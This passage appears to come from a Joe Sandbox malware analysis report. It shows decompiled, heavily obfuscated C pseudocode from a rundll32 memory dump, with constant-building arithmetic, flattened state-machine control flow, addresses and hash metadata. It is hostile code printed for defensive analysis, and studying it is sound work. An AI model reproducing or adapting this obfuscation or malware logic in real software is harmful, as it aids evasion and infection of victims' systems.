                                                                                                                      					L9:
                                                                                                                      					__eflags = _t307 - 0xce6287b;
                                                                                                                      				} while (_t307 != 0xce6287b);
                                                                                                                      				goto L12;
                                                                                                                      			}

                                                                                                                      0x00822df1
                                                                                                                      0x00822df5
                                                                                                                      0x00822dfd
                                                                                                                      0x00822dfd
                                                                                                                      0x00822e03
                                                                                                                      0x00822e35
                                                                                                                      0x00822e3a
                                                                                                                      0x00822e3d
                                                                                                                      0x00822e3f
                                                                                                                      0x00822e45
                                                                                                                      0x00000000
                                                                                                                      0x00822e45
                                                                                                                      0x00822e05
                                                                                                                      0x00822e0b
                                                                                                                      0x00822f31
                                                                                                                      0x00822e11
                                                                                                                      0x00822e17
                                                                                                                      0x00000000
                                                                                                                      0x00822e1d
                                                                                                                      0x00822e1d
                                                                                                                      0x00000000
                                                                                                                      0x00822e1d
                                                                                                                      0x00822e17
                                                                                                                      0x00822e0b
                                                                                                                      0x00822f39
                                                                                                                      0x00822f44
                                                                                                                      0x00822f44
                                                                                                                      0x00822e49
                                                                                                                      0x00822e54
                                                                                                                      0x00822e58
                                                                                                                      0x00822e5c
                                                                                                                      0x00822e62
                                                                                                                      0x00822e63
                                                                                                                      0x00822e68
                                                                                                                      0x00822e6c
                                                                                                                      0x00822e77
                                                                                                                      0x00822e7f
                                                                                                                      0x00822e83
                                                                                                                      0x00822e90
                                                                                                                      0x00822eac
                                                                                                                      0x00822ef2
                                                                                                                      0x00822f03
                                                                                                                      0x00822f08
                                                                                                                      0x00822f0b
                                                                                                                      0x00822f10
                                                                                                                      0x00822f10
                                                                                                                      0x00822f10
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: *$D$[V$lP$s/?$E
                                                                                                                      • API String ID: 0-4039435091
                                                                                                                      • Opcode ID: 069ea14ee9a12fcdf10bed25a08896db3a4c5dcc2c46f0827f78cac7be91594e
                                                                                                                      • Instruction ID: b5850d847cf58d5e6f09764c904d92ff19ed6f5d2e415837b610e33d9aa3d2ba
                                                                                                                      • Opcode Fuzzy Hash: 069ea14ee9a12fcdf10bed25a08896db3a4c5dcc2c46f0827f78cac7be91594e
                                                                                                                      • Instruction Fuzzy Hash: 5DC13F71508380AFD364CF64C98AA1BFBE1FBD8748F509A1DF69586260C7B98948CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E00817CF4(void* __ecx) {
                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				char _v1560;
                                                                                                                      				signed int _v1564;
                                                                                                                      				signed int _v1568;
                                                                                                                      				signed int _v1572;
                                                                                                                      				signed int _v1576;
                                                                                                                      				signed int _v1580;
                                                                                                                      				signed int _v1584;
                                                                                                                      				signed int _v1588;
                                                                                                                      				signed int _v1592;
                                                                                                                      				signed int _v1596;
                                                                                                                      				signed int _v1600;
                                                                                                                      				signed int _v1604;
                                                                                                                      				signed int _v1608;
                                                                                                                      				signed int _v1612;
                                                                                                                      				signed int _v1616;
                                                                                                                      				signed int _v1620;
                                                                                                                      				signed int _v1624;
                                                                                                                      				signed int _v1628;
                                                                                                                      				signed int _v1632;
                                                                                                                      				signed int _v1636;
                                                                                                                      				signed int _v1640;
                                                                                                                      				signed int _v1644;
                                                                                                                      				signed int _v1648;
                                                                                                                      				signed int _v1652;
                                                                                                                      				signed int _v1656;
                                                                                                                      				signed int _v1660;
                                                                                                                      				signed int _v1664;
                                                                                                                      				signed int _v1668;
                                                                                                                      				signed int _t258;
                                                                                                                      				signed int _t271;
                                                                                                                      				signed int _t272;
                                                                                                                      				signed int _t273;
                                                                                                                      				signed int _t274;
                                                                                                                      				signed int _t275;
                                                                                                                      				signed int _t276;
                                                                                                                      				void* _t303;
                                                                                                                      				void* _t304;
                                                                                                                      				signed int* _t307;
                                                                                                                      
                                                                                                                      				_t307 =  &_v1668;
                                                                                                                      				_v1644 = 0x34739e;
                                                                                                                      				_v1644 = _v1644 * 0x43;
                                                                                                                      				_t303 = __ecx;
                                                                                                                      				_v1644 = _v1644 >> 0xb;
                                                                                                                      				_t304 = 0x422d362;
                                                                                                                      				_t271 = 0x7d;
                                                                                                                      				_v1644 = _v1644 / _t271;
                                                                                                                      				_v1644 = _v1644 ^ 0x00084d9c;
                                                                                                                      				_v1612 = 0xb20ebf;
                                                                                                                      				_v1612 = _v1612 << 0xe;
                                                                                                                      				_v1612 = _v1612 ^ 0x83a04dde;
                                                                                                                      				_v1580 = 0xaa66ba;
                                                                                                                      				_v1580 = _v1580 + 0xffff0111;
                                                                                                                      				_v1580 = _v1580 ^ 0x00ac31ef;
                                                                                                                      				_v1604 = 0x4a91ac;
                                                                                                                      				_v1604 = _v1604 | 0x86032005;
                                                                                                                      				_v1604 = _v1604 ^ 0x86453654;
                                                                                                                      				_v1660 = 0x3cdcbf;
                                                                                                                      				_t272 = 0x34;
                                                                                                                      				_v1660 = _v1660 / _t272;
                                                                                                                      				_v1660 = _v1660 << 9;
                                                                                                                      				_t273 = 0x19;
                                                                                                                      				_v1660 = _v1660 * 0x33;
                                                                                                                      				_v1660 = _v1660 ^ 0x776ddfce;
                                                                                                                      				_v1620 = 0xfdfe87;
                                                                                                                      				_v1620 = _v1620 | 0x8debc5e9;
                                                                                                                      				_v1620 = _v1620 ^ 0x8df4241a;
                                                                                                                      				_v1596 = 0xc5e4de;
                                                                                                                      				_v1596 = _v1596 / _t273;
                                                                                                                      				_v1596 = _v1596 ^ 0x000ab9e2;
                                                                                                                      				_v1568 = 0x4c47da;
                                                                                                                      				_v1568 = _v1568 + 0x5d3c;
                                                                                                                      				_v1568 = _v1568 ^ 0x0043a9f3;
                                                                                                                      				_v1564 = 0xed5f6a;
                                                                                                                      				_t274 = 0x2a;
                                                                                                                      				_v1564 = _v1564 / _t274;
                                                                                                                      				_v1564 = _v1564 ^ 0x00049b09;
                                                                                                                      				_v1588 = 0xe27f75;
                                                                                                                      				_t275 = 0x68;
                                                                                                                      				_v1588 = _v1588 * 0x15;
                                                                                                                      				_v1588 = _v1588 ^ 0x129f57f0;
                                                                                                                      				_v1572 = 0x58913e;
                                                                                                                      				_v1572 = _v1572 + 0xffff0520;
                                                                                                                      				_v1572 = _v1572 ^ 0x005b93ab;
                                                                                                                      				_v1648 = 0xac4e73;
                                                                                                                      				_v1648 = _v1648 >> 8;
                                                                                                                      				_v1648 = _v1648 >> 0x10;
                                                                                                                      				_v1648 = _v1648 << 3;
                                                                                                                      				_v1648 = _v1648 ^ 0x000ac3bf;
                                                                                                                      				_v1668 = 0x5a6a4e;
                                                                                                                      				_t90 =  &_v1668; // 0x5a6a4e
                                                                                                                      				_v1668 =  *_t90 * 0x58;
                                                                                                                      				_t92 =  &_v1668; // 0x5a6a4e
                                                                                                                      				_v1668 =  *_t92 / _t275;
                                                                                                                      				_v1668 = _v1668 << 1;
                                                                                                                      				_v1668 = _v1668 ^ 0x009738dd;
                                                                                                                      				_v1640 = 0x7a6607;
                                                                                                                      				_t276 = 0x65;
                                                                                                                      				_v1640 = _v1640 * 0xa;
                                                                                                                      				_v1640 = _v1640 >> 9;
                                                                                                                      				_v1640 = _v1640 | 0xf246f931;
                                                                                                                      				_v1640 = _v1640 ^ 0xf242cc5d;
                                                                                                                      				_v1628 = 0xa390c8;
                                                                                                                      				_v1628 = _v1628 << 0xf;
                                                                                                                      				_v1628 = _v1628 ^ 0x3ac7d651;
                                                                                                                      				_v1628 = _v1628 ^ 0xf2afedad;
                                                                                                                      				_v1652 = 0x2d980b;
                                                                                                                      				_v1652 = _v1652 * 0x71;
                                                                                                                      				_v1652 = _v1652 * 0x17;
                                                                                                                      				_v1652 = _v1652 ^ 0x28f4da4d;
                                                                                                                      				_v1652 = _v1652 ^ 0xe6141d35;
                                                                                                                      				_v1636 = 0x37785c;
                                                                                                                      				_v1636 = _v1636 + 0xffffcffd;
                                                                                                                      				_v1636 = _v1636 ^ 0x6b7d5c73;
                                                                                                                      				_v1636 = _v1636 ^ 0x6b457d84;
                                                                                                                      				_v1616 = 0xb1620;
                                                                                                                      				_v1616 = _v1616 << 0x10;
                                                                                                                      				_v1616 = _v1616 ^ 0x162b8e46;
                                                                                                                      				_v1632 = 0x4c47;
                                                                                                                      				_v1632 = _v1632 + 0xffffc0f0;
                                                                                                                      				_v1632 = _v1632 + 0xffffd3bf;
                                                                                                                      				_v1632 = _v1632 ^ 0xfff44e1b;
                                                                                                                      				_v1664 = 0xa6b80c;
                                                                                                                      				_v1664 = _v1664 + 0xf763;
                                                                                                                      				_v1664 = _v1664 * 0x6e;
                                                                                                                      				_v1664 = _v1664 / _t276;
                                                                                                                      				_v1664 = _v1664 ^ 0x00b9c638;
                                                                                                                      				_v1600 = 0xaa0054;
                                                                                                                      				_v1600 = _v1600 ^ 0xf2e3595a;
                                                                                                                      				_v1600 = _v1600 ^ 0xf24e3ce3;
                                                                                                                      				_v1608 = 0x669547;
                                                                                                                      				_v1608 = _v1608 + 0xe3ee;
                                                                                                                      				_v1608 = _v1608 ^ 0x0066aeed;
                                                                                                                      				_v1656 = 0xf50b8d;
                                                                                                                      				_v1656 = _v1656 + 0xffffe5b9;
                                                                                                                      				_v1656 = _v1656 * 0x19;
                                                                                                                      				_v1656 = _v1656 * 0x2c;
                                                                                                                      				_v1656 = _v1656 ^ 0x1c789090;
                                                                                                                      				_v1576 = 0xf13773;
                                                                                                                      				_v1576 = _v1576 | 0xffe45fc0;
                                                                                                                      				_v1576 = _v1576 ^ 0xfffeb9af;
                                                                                                                      				_v1624 = 0xc714fc;
                                                                                                                      				_v1624 = _v1624 << 7;
                                                                                                                      				_v1624 = _v1624 * 0x4d;
                                                                                                                      				_v1624 = _v1624 ^ 0xf0acb0c0;
                                                                                                                      				_v1584 = 0x43b9ac;
                                                                                                                      				_v1584 = _v1584 + 0xfffff1bc;
                                                                                                                      				_v1584 = _v1584 ^ 0x004aa621;
                                                                                                                      				_v1592 = 0x5bf493;
                                                                                                                      				_t258 = _v1592 * 0x43;
                                                                                                                      				_v1592 = _t258;
                                                                                                                      				_v1592 = _v1592 ^ 0x181e9f62;
                                                                                                                      				while(_t304 != 0x2953b22) {
                                                                                                                      					if(_t304 == 0x422d362) {
                                                                                                                      						_t304 = 0xe704baa;
                                                                                                                      						continue;
                                                                                                                      					} else {
                                                                                                                      						_t312 = _t304 - 0xe704baa;
                                                                                                                      						if(_t304 != 0xe704baa) {
                                                                                                                      							L8:
                                                                                                                      							__eflags = _t304 - 0x740d40c;
                                                                                                                      							if(__eflags != 0) {
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							E008306A8(_t276, _v1644, _t312, _v1612, _v1580,  &_v1560);
                                                                                                                      							 *((short*)(E008243A8(_v1604,  &_v1560, _v1660, _v1620))) = 0;
                                                                                                                      							E00817A50(_v1596,  &_v520, _t312, _v1568);
                                                                                                                      							_push(_v1648);
                                                                                                                      							_push(_v1572);
                                                                                                                      							_push(0x1000183c);
                                                                                                                      							E0081DBCE(E00819F66(_v1564, _v1588, _t312), _t312, _v1668,  &_v1560, _v1564, _v1640, _v1628, _v1652, _v1636,  &_v520);
                                                                                                                      							E0081A203(_v1616, _v1632, _v1664, _t264);
                                                                                                                      							_t276 = _v1600;
                                                                                                                      							_t258 = E0082B78F(_t276,  &_v1040, _t303, _v1608);
                                                                                                                      							_t307 =  &(_t307[0x15]);
                                                                                                                      							if(_t258 != 0) {
                                                                                                                      								_t304 = 0x2953b22;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					return _t258;
                                                                                                                      				}
                                                                                                                      				_push(_v1592);
                                                                                                                      				_push(_v1584);
                                                                                                                      				_push(_v1624);
                                                                                                                      				_push( &_v1040);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_v1576);
                                                                                                                      				_push(_t276);
                                                                                                                      				_push(0);
                                                                                                                      				_t276 = 0;
                                                                                                                      				__eflags = 0;
                                                                                                                      				_t258 = E00818B00(0, _v1656, 0);
                                                                                                                      				_t307 =  &(_t307[8]);
                                                                                                                      				_t304 = 0x740d40c;
                                                                                                                      				goto L8;
                                                                                                                      			}












































                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: <]$GL$NjZ$T$j_$s\}k
                                                                                                                      • API String ID: 0-1588241565
                                                                                                                      • Opcode ID: b00b51148bd1393473e6693032dd293d1e4f5da7aeb51f141611b5ebc4386db2
                                                                                                                      • Instruction ID: 309d609c57374ec08e0b15776c19bccc84e62b96672cc91d70b4da23161b678c
                                                                                                                      • Opcode Fuzzy Hash: b00b51148bd1393473e6693032dd293d1e4f5da7aeb51f141611b5ebc4386db2
                                                                                                                      • Instruction Fuzzy Hash: 5FC1FF724083419FC368CF25C58A94BFBE5FBC4708F008A1DF5A696260D7B59A0ACF87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E008164ED() {
                                                                                                                      				char _v520;
                                                                                                                      				signed int _v524;
                                                                                                                      				signed int _v528;
                                                                                                                      				signed int _v532;
                                                                                                                      				signed int _v536;
                                                                                                                      				signed int _v540;
                                                                                                                      				signed int _v544;
                                                                                                                      				signed int _v548;
                                                                                                                      				signed int _v552;
                                                                                                                      				signed int _v556;
                                                                                                                      				signed int _v560;
                                                                                                                      				signed int _v564;
                                                                                                                      				signed int _v568;
                                                                                                                      				signed int _v572;
                                                                                                                      				signed int _v576;
                                                                                                                      				signed int _v580;
                                                                                                                      				signed int _v584;
                                                                                                                      				signed int _v588;
                                                                                                                      				signed int _v592;
                                                                                                                      				signed int _v596;
                                                                                                                      				signed int _v600;
                                                                                                                      				signed int _v604;
                                                                                                                      				signed int _v608;
                                                                                                                      				signed int _v612;
                                                                                                                      				signed int _t202;
                                                                                                                      				signed int _t203;
                                                                                                                      				void* _t204;
                                                                                                                      				void* _t218;
                                                                                                                      				signed int _t241;
                                                                                                                      				signed int _t242;
                                                                                                                      				signed int _t243;
                                                                                                                      				signed int _t244;
                                                                                                                      				void* _t246;
                                                                                                                      				signed int* _t248;
                                                                                                                      				void* _t251;
                                                                                                                      
                                                                                                                      				_t248 =  &_v612;
                                                                                                                      				_v540 = 0xdad4cc;
                                                                                                                      				_v540 = _v540 ^ 0x94191629;
                                                                                                                      				_t218 = 0x6f2f9f8;
                                                                                                                      				_v540 = _v540 ^ 0x94c3c2f9;
                                                                                                                      				_v544 = 0x76e0f0;
                                                                                                                      				_v544 = _v544 << 0x10;
                                                                                                                      				_v544 = _v544 ^ 0xe0f00029;
                                                                                                                      				_v536 = 0x3bc67a;
                                                                                                                      				_v536 = _v536 >> 0xc;
                                                                                                                      				_v536 = _v536 ^ 0x000f0383;
                                                                                                                      				_v568 = 0x8bde3b;
                                                                                                                      				_v568 = _v568 + 0xffff2322;
                                                                                                                      				_v568 = _v568 ^ 0x008d993e;
                                                                                                                      				_v596 = 0x92619;
                                                                                                                      				_v596 = _v596 ^ 0xd159791b;
                                                                                                                      				_v596 = _v596 + 0xffff3449;
                                                                                                                      				_v596 = _v596 | 0x988058a4;
                                                                                                                      				_v596 = _v596 ^ 0xd9ccc0e1;
                                                                                                                      				_v608 = 0xa06713;
                                                                                                                      				_t241 = 0x29;
                                                                                                                      				_v608 = _v608 / _t241;
                                                                                                                      				_v608 = _v608 ^ 0x6a345d45;
                                                                                                                      				_t246 = 0;
                                                                                                                      				_v608 = _v608 << 0xe;
                                                                                                                      				_v608 = _v608 ^ 0xed3298df;
                                                                                                                      				_v576 = 0x1c835f;
                                                                                                                      				_v576 = _v576 ^ 0xdf607740;
                                                                                                                      				_v576 = _v576 >> 0xb;
                                                                                                                      				_v576 = _v576 ^ 0x0012ec93;
                                                                                                                      				_v584 = 0x7ddda5;
                                                                                                                      				_t242 = 0x76;
                                                                                                                      				_v584 = _v584 / _t242;
                                                                                                                      				_v584 = _v584 | 0x464a7126;
                                                                                                                      				_v584 = _v584 ^ 0x4642215f;
                                                                                                                      				_v548 = 0x20374d;
                                                                                                                      				_t243 = 0x71;
                                                                                                                      				_v548 = _v548 * 0x6c;
                                                                                                                      				_v548 = _v548 ^ 0x0d9d239d;
                                                                                                                      				_v528 = 0x9116;
                                                                                                                      				_v528 = _v528 ^ 0x0b2a50da;
                                                                                                                      				_v528 = _v528 ^ 0x0b2b7a92;
                                                                                                                      				_v600 = 0xee9b3a;
                                                                                                                      				_v600 = _v600 | 0x1ae7cac3;
                                                                                                                      				_v600 = _v600 + 0x2aec;
                                                                                                                      				_v600 = _v600 | 0xe5d5fb71;
                                                                                                                      				_v600 = _v600 ^ 0xfffe899a;
                                                                                                                      				_v556 = 0x2fd7b1;
                                                                                                                      				_v556 = _v556 / _t243;
                                                                                                                      				_v556 = _v556 ^ 0x0001ae08;
                                                                                                                      				_v552 = 0xd06bd7;
                                                                                                                      				_v552 = _v552 + 0x9aba;
                                                                                                                      				_v552 = _v552 ^ 0x00dba68b;
                                                                                                                      				_v560 = 0x3f6698;
                                                                                                                      				_v560 = _v560 ^ 0x9e976c20;
                                                                                                                      				_v560 = _v560 ^ 0x9ea088a0;
                                                                                                                      				_v564 = 0xf04caf;
                                                                                                                      				_v564 = _v564 << 0xc;
                                                                                                                      				_v564 = _v564 ^ 0x04c86801;
                                                                                                                      				_v532 = 0x4abe1e;
                                                                                                                      				_v532 = _v532 + 0xffff7e54;
                                                                                                                      				_v532 = _v532 ^ 0x0047677c;
                                                                                                                      				_v592 = 0xfc3d76;
                                                                                                                      				_v592 = _v592 >> 4;
                                                                                                                      				_t244 = 0x67;
                                                                                                                      				_t245 = _v524;
                                                                                                                      				_v592 = _v592 / _t244;
                                                                                                                      				_v592 = _v592 ^ 0x0e63bcd1;
                                                                                                                      				_v592 = _v592 ^ 0x0e6c0c0a;
                                                                                                                      				_v580 = 0x87074e;
                                                                                                                      				_v580 = _v580 + 0x3b8f;
                                                                                                                      				_v580 = _v580 + 0xffffa265;
                                                                                                                      				_v580 = _v580 ^ 0x008cb1a6;
                                                                                                                      				_v588 = 0xe717aa;
                                                                                                                      				_v588 = _v588 | 0xfff18f7b;
                                                                                                                      				_v588 = _v588 >> 0xb;
                                                                                                                      				_v588 = _v588 ^ 0x001226f1;
                                                                                                                      				_v604 = 0x61f630;
                                                                                                                      				_v604 = _v604 | 0xec5f2186;
                                                                                                                      				_v604 = _v604 ^ 0x97c62f9e;
                                                                                                                      				_v604 = _v604 ^ 0x80f94e8c;
                                                                                                                      				_v604 = _v604 ^ 0xfb4d53d4;
                                                                                                                      				_v612 = 0x890e92;
                                                                                                                      				_v612 = _v612 >> 9;
                                                                                                                      				_v612 = _v612 + 0xf9d4;
                                                                                                                      				_v612 = _v612 + 0xffff7e3c;
                                                                                                                      				_v612 = _v612 ^ 0x000167a4;
                                                                                                                      				_v572 = 0xa3f922;
                                                                                                                      				_v572 = _v572 << 1;
                                                                                                                      				_v572 = _v572 + 0x9b39;
                                                                                                                      				_v572 = _v572 ^ 0x014464a5;
                                                                                                                      				goto L1;
                                                                                                                      				do {
                                                                                                                      					while(1) {
                                                                                                                      						L1:
                                                                                                                      						_t251 = _t218 - 0xaf66d96;
                                                                                                                      						if(_t251 > 0) {
                                                                                                                      							break;
                                                                                                                      						}
                                                                                                                      						if(_t251 == 0) {
                                                                                                                      							_push(_t218);
                                                                                                                      							_t176 =  *0x1002520c + 8; // 0x681b7559
                                                                                                                      							_t203 = E0081DE7B(_t176, _v552, _v524, _t218, _v560, _v564, _v532);
                                                                                                                      							_t248 =  &(_t248[7]);
                                                                                                                      							_t218 = 0xbcbad55;
                                                                                                                      							__eflags = _t203;
                                                                                                                      							_t204 = 1;
                                                                                                                      							_t246 =  ==  ? _t204 : _t246;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t218 == 0x1700698) {
                                                                                                                      							E0082DA89(_v548, _v528, _v600, _t245, _v556);
                                                                                                                      							_t248 =  &(_t248[3]);
                                                                                                                      							L9:
                                                                                                                      							_t218 = 0xaf66d96;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t218 == 0x4f7449d) {
                                                                                                                      							_v524 = _v540;
                                                                                                                      							goto L9;
                                                                                                                      						}
                                                                                                                      						if(_t218 == 0x51416c3) {
                                                                                                                      							E008306A8(_t218, _v592, __eflags, _v580, _v588,  &_v520);
                                                                                                                      							 *((intOrPtr*)( *0x1002520c + 4)) = E00816A77( &_v520, _v604, _v612, _v572);
                                                                                                                      							L23:
                                                                                                                      							return _t246;
                                                                                                                      						}
                                                                                                                      						if(_t218 != 0x6f2f9f8) {
                                                                                                                      							goto L20;
                                                                                                                      						}
                                                                                                                      						_push(_t218);
                                                                                                                      						_push(_t218);
                                                                                                                      						 *0x1002520c = E00822912(0x444);
                                                                                                                      						_t218 = 0xcc58939;
                                                                                                                      					}
                                                                                                                      					__eflags = _t218 - 0xbcbad55;
                                                                                                                      					if(_t218 == 0xbcbad55) {
                                                                                                                      						E0081DC6A();
                                                                                                                      						_t218 = 0x51416c3;
                                                                                                                      						goto L20;
                                                                                                                      					}
                                                                                                                      					__eflags = _t218 - 0xcc58939;
                                                                                                                      					if(_t218 == 0xcc58939) {
                                                                                                                      						_t202 = E0081DF36(_v576, _v584, _t218, _v536);
                                                                                                                      						_t245 = _t202;
                                                                                                                      						_t248 =  &(_t248[3]);
                                                                                                                      						__eflags = _t202;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							_t218 = 0x4f7449d;
                                                                                                                      						} else {
                                                                                                                      							 *((intOrPtr*)( *0x1002520c + 0x438)) = 1;
                                                                                                                      							_t218 = 0xdbc7fda;
                                                                                                                      						}
                                                                                                                      						goto L1;
                                                                                                                      					}
                                                                                                                      					__eflags = _t218 - 0xdbc7fda;
                                                                                                                      					if(__eflags != 0) {
                                                                                                                      						goto L20;
                                                                                                                      					}
                                                                                                                      					_t218 = 0x1700698;
                                                                                                                      					_v524 = _v544;
                                                                                                                      					goto L1;
                                                                                                                      					L20:
                                                                                                                      					__eflags = _t218 - 0xee3620e;
                                                                                                                      				} while (__eflags != 0);
                                                                                                                      				goto L23;
                                                                                                                      			}

                                                                                                                      0x00816636
                                                                                                                      0x0081663e
                                                                                                                      0x00816646
                                                                                                                      0x0081664e
                                                                                                                      0x0081665c
                                                                                                                      0x00816660
                                                                                                                      0x00816668
                                                                                                                      0x00816670
                                                                                                                      0x00816678
                                                                                                                      0x00816680
                                                                                                                      0x00816688
                                                                                                                      0x00816690
                                                                                                                      0x00816698
                                                                                                                      0x008166a0
                                                                                                                      0x008166a5
                                                                                                                      0x008166ad
                                                                                                                      0x008166b5
                                                                                                                      0x008166bd
                                                                                                                      0x008166c5
                                                                                                                      0x008166cd
                                                                                                                      0x008166df
                                                                                                                      0x008166e2
                                                                                                                      0x008166eb
                                                                                                                      0x008166ef
                                                                                                                      0x008166f7
                                                                                                                      0x008166ff
                                                                                                                      0x00816707
                                                                                                                      0x0081670f
                                                                                                                      0x00816717
                                                                                                                      0x0081671f
                                                                                                                      0x00816727
                                                                                                                      0x0081672f
                                                                                                                      0x00816734
                                                                                                                      0x0081673c
                                                                                                                      0x00816744
                                                                                                                      0x0081674c
                                                                                                                      0x00816754
                                                                                                                      0x0081675c
                                                                                                                      0x00816764
                                                                                                                      0x0081676c
                                                                                                                      0x00816771
                                                                                                                      0x00816779
                                                                                                                      0x00816781
                                                                                                                      0x00816789
                                                                                                                      0x00816791
                                                                                                                      0x00816795
                                                                                                                      0x0081679d
                                                                                                                      0x0081679d
                                                                                                                      0x008167a5
                                                                                                                      0x008167a5
                                                                                                                      0x008167a5
                                                                                                                      0x008167a5
                                                                                                                      0x008167a7
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x008167ad
                                                                                                                      0x00816820
                                                                                                                      0x0081683c
                                                                                                                      0x0081683f
                                                                                                                      0x00816844
                                                                                                                      0x00816847
                                                                                                                      0x0081684c
                                                                                                                      0x00816850
                                                                                                                      0x00816851
                                                                                                                      0x00000000
                                                                                                                      0x00816851
                                                                                                                      0x008167b5
                                                                                                                      0x00816816
                                                                                                                      0x0081681b
                                                                                                                      0x00816801
                                                                                                                      0x00816801
                                                                                                                      0x00000000
                                                                                                                      0x00816801
                                                                                                                      0x008167b9
                                                                                                                      0x008167fd
                                                                                                                      0x00000000
                                                                                                                      0x008167fd
                                                                                                                      0x008167c1
                                                                                                                      0x008168e6
                                                                                                                      0x00816909
                                                                                                                      0x0081690d
                                                                                                                      0x00816918
                                                                                                                      0x00816918
                                                                                                                      0x008167cd
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x008167df
                                                                                                                      0x008167e0
                                                                                                                      0x008167ed
                                                                                                                      0x008167f2
                                                                                                                      0x008167f2
                                                                                                                      0x00816859
                                                                                                                      0x0081685f
                                                                                                                      0x008168bd
                                                                                                                      0x008168c2
                                                                                                                      0x00000000
                                                                                                                      0x008168c2
                                                                                                                      0x00816861
                                                                                                                      0x00816867
                                                                                                                      0x00816890
                                                                                                                      0x00816895
                                                                                                                      0x00816897
                                                                                                                      0x0081689a
                                                                                                                      0x0081689c
                                                                                                                      0x008168b6
                                                                                                                      0x0081689e
                                                                                                                      0x008168a6
                                                                                                                      0x008168ac
                                                                                                                      0x008168ac
                                                                                                                      0x00000000
                                                                                                                      0x0081689c
                                                                                                                      0x00816869
                                                                                                                      0x0081686f
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00816875
                                                                                                                      0x0081687a
                                                                                                                      0x00000000
                                                                                                                      0x008168c7
                                                                                                                      0x008168c7
                                                                                                                      0x008168c7
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00810000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_810000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )$E]4j$M7 $_!BF$|gG$*
                                                                                                                      • API String ID: 0-1206799572
                                                                                                                      • Opcode ID: bfbaff5646489ae7fac545b187a43203f066b75ffc2a216d9bccf810a554567d
                                                                                                                      • Instruction ID: cadd7a099aab494273c31e5c510634d6161f91a731e29203e44eb69fea39cab2
                                                                                                                      • Opcode Fuzzy Hash: bfbaff5646489ae7fac545b187a43203f066b75ffc2a216d9bccf810a554567d
                                                                                                                      • Instruction Fuzzy Hash: CBA132B15083819FD768CF24D48A81BBBE5FFC5358F20891DF69686260E3B18999CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 99%
                                                                                                                      			E00824440(void* __ecx, void* __edx) {
                                                                                                                      				signed int _v4;
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _t222;
                                                                                                                      				signed int _t224;
                                                                                                                      				void* _t227;
                                                                                                                      				signed int _t229;
                                                                                                                      				signed int _t230;
                                                                                                                      				signed int _t231;
                                                                                                                      				signed int _t232;
                                                                                                                      				signed int _t233;
                                                                                                                      				signed int _t234;
                                                                                                                      				signed int _t235;
                                                                                                                      				void* _t261;
                                                                                                                      				void* _t262;
                                                                                                                      				signed int* _t264;
                                                                                                                      				signed int* _t265;
                                                                                                                      
                                                                                                                      				_t264 =  &_v80;
                                                                                                                      				_v64 = 0xca2d1a;
                                                                                                                      				_v64 = _v64 + 0xffff463a;
                                                                                                                      				_v64 = _v64 + 0xffffa2b5;
                                                                                                                      				_v64 = _v64 + 0xffffe441;
                                                                                                                      				_v64 = _v64 ^ 0x00ce8887;
                                                                                                                      				_v68 = 0xe757b6;
                                                                                                                      				_t261 = __edx;
                                                                                                                      				_t227 = __ecx;
                                                                                                                      				_t262 = 0xd46e588;
                                                                                                                      				_t229 = 0x7b;
                                                                                                                      				_v68 = _v68 / _t229;
                                                                                                                      				_v68 = _v68 | 0x2f3c6c23;
                                                                                                                      				_v68 = _v68 << 5;
                                                                                                                      				_v68 = _v68 ^ 0xe7b70971;
                                                                                                                      				_v72 = 0xa66d67;
                                                                                                                      				_v72 = _v72 + 0xffff9e81;
                                                                                                                      				_v72 = _v72 + 0xffffa01d;
                                                                                                                      				_v72 = _v72 + 0xd858;
